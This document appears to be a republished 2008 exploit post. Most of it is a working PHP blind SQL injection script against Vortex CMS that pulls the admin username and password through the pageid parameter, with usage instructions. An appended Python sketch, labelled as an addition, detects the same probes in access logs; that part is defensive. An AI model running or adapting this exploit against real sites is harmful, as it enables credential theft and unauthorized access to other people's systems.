Vortex CMS (index.php pageid) Blind SQL Injection Exploit
Source: www.vfcocus.net  Author: Lidloses  Published: 2008-05-12
<?php
ini_set("max_execution_time",0);
print_r('
###############################################################
#
#   Vortex CMS - Blind SQL Injection Exploit    
#                                                            
#      Vulnerability discovered by: Lidloses_Auge            
#      Exploit coded by:            Lidloses_Auge
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco
#                                   GPM, Free-Hack
#      Date:                        10.05.2008
#
###############################################################
#                                                            
#      Usage: php '.$argv[0].' [Target] [Page ID] [User ID]
#      Example for "http://www.site.com/cms/index.php?pageid=1"
#      => php '.$argv[0].' http://www.site.com/cms/ 1 1
#                                                            
###############################################################
');
if ($argc > 1) {
print_r('
');
   echo 'Searching for Admin: ';
   for($i=1; $i <= 50; $i++) {
      $temp1 = file_get_contents($argv[1].'index.php?pageid='.$argv[2].'\'and+length((select+username+from+system_users_logins+where+id='.$argv[3].'))='.$i.'/*');
      if (strpos($temp1,'Sorry, the page you requested could not be found.') == 0) {
         $adlen = $i;
         $i = 50;
      }
   }
   for($i=1; $i <= $adlen; $i++) {
      for($zahl=46; $zahl <= 122; $zahl++) {
         $temp = file_get_contents($argv[1].'index.php?pageid='.$argv[2].'\'and+ascii(substring((select+username+from+system_users_logins+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'/*');
         if (strpos($temp,'Sorry, the page you requested could not be found.') == 0) {
            echo chr($zahl);
            $zahl = 122;
         }
         if ($zahl == 57) {
            $zahl = 64;
         }
      }
   }
print_r('
');
   echo 'Searching for Password: ';
   for($i=1; $i <= 50; $i++) {
      $temp1 = file_get_contents($argv[1].'index.php?pageid='.$argv[2].'\'and+length((select+password+from+system_users_logins+where+id='.$argv[3].'))='.$i.'/*');
      if (strpos($temp1,'Sorry, the page you requested could not be found.') == 0) {
         $adlen = $i;
         $i = 50;
      }
   }
   for($i=1; $i <= $adlen; $i++) {
      for($zahl=46; $zahl <= 122; $zahl++) {
         $temp = file_get_contents($argv[1].'index.php?pageid='.$argv[2].'\'and+ascii(substring((select+password+from+system_users_logins+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'/*');
         if (strpos($temp,'Sorry, the page you requested could not be found.') == 0) {
            echo chr($zahl);
            $zahl = 122;
         }
         if ($zahl == 57) {
            $zahl = 64;
         }
      }
   }
}
?>
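Added example (not part of the original post or the author's code): a log-review sketch that flags the two request shapes the script above sends in the pageid parameter and records, per client, the highest character position probed for each column. The combined log format, the function name summarize and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.20 - - [12/May/2008:10:00:00 +0000] "GET /cms/index.php?pageid=1 HTTP/1.1" 200 4096
203.0.113.7 - - [12/May/2008:10:00:01 +0000] "GET /cms/index.php?pageid=1'and+length((select+username+from+system_users_logins+where+id=1))=5/* HTTP/1.0" 200 2048
203.0.113.7 - - [12/May/2008:10:00:02 +0000] "GET /cms/index.php?pageid=1'and+ascii(substring((select+username+from+system_users_logins+where+id=1),1,1))=97/* HTTP/1.0" 200 2048
203.0.113.7 - - [12/May/2008:10:00:03 +0000] "GET /cms/index.php?pageid=1'and+ascii(substring((select+username+from+system_users_logins+where+id=1),2,1))=100/* HTTP/1.0" 200 2048
203.0.113.7 - - [12/May/2008:10:00:04 +0000] "GET /cms/index.php?pageid=1'and+length((select+password+from+system_users_logins+where+id=1))=32/* HTTP/1.0" 200 2048
203.0.113.7 - - [12/May/2008:10:00:05 +0000] "GET /cms/index.php?pageid=1'and+ascii(substring((select+password+from+system_users_logins+where+id=1),1,1))=52/* HTTP/1.0" 200 2048
203.0.113.7 - - [12/May/2008:10:00:06 +0000] "GET /cms/index.php?pageid=1%27and+ascii(substring((select+password+from+system_users_logins+where+id=1),32,1))=102/* HTTP/1.0" 200 2048
"""

REQUEST = re.compile(r'^(\S+) .*?"GET (\S+) HTTP/[\d.]+"')
# The two probe shapes seen in the script: a length test and a per-character test.
LENGTH = re.compile(r"'\s*and\s+length\(\(select\s+(\w+)\s+from\s+(\w+)", re.I)
CHAR = re.compile(
    r"'\s*and\s+ascii\(substring\(\(select\s+(\w+)\s+from\s+(\w+).*?\),\s*(\d+)\s*,\s*1\)\)",
    re.I,
)

def summarize(log_text):
    """Per client IP: probe count and, per (table, column), highest position probed."""
    report = defaultdict(lambda: {"probes": 0, "targets": defaultdict(int)})
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, url = m.groups()
        # parse_qs decodes %27 and '+' so encoded and raw probes match alike.
        for value in parse_qs(urlsplit(url).query).get("pageid", []):
            char = CHAR.search(value)
            hit = char or LENGTH.search(value)
            if not hit:
                continue
            entry = report[ip]
            entry["probes"] += 1
            key = (hit.group(2), hit.group(1))   # (table, column)
            pos = int(char.group(3)) if char else 0
            entry["targets"][key] = max(entry["targets"][key], pos)
    return report

if __name__ == "__main__":
    for ip, entry in summarize(SAMPLE_LOG).items():
        print(ip, entry["probes"], dict(entry["targets"]))
```

The highest position probed per column gives an upper bound on how many characters of that value the client could have read, which helps decide which credentials to rotate.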

 